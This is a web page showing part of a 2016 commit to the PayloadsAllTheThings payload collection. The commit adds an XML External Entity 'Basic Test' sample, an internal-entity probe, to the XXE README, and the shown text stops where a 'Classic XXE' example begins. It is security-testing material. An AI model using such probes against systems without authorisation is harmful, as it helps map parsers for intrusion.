gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2026-03-01 15:03:12 -08:00
Code Issues Packages Projects Releases Wiki Activity

NOSQL injection added + updates XSS/XXE

Browse Source
This commit is contained in:
swisskyrepo
2016-10-30 18:53:32 +07:00
parent a9fe14fa29
commit d0e164b6b1
3 changed files with 44 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files

10
XXE files/README.md
View File

@@ -3,6 +3,16 @@ An XML External Entity attack is a type of attack against an application that pa
## Exploit
Basic Test
```
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY example "Doe"> ]>
<userInfo>
<firstName>John</firstName>
<lastName>&example;</lastName>
</userInfo>
```
Classic XXE
```
<?xml version="1.0"?>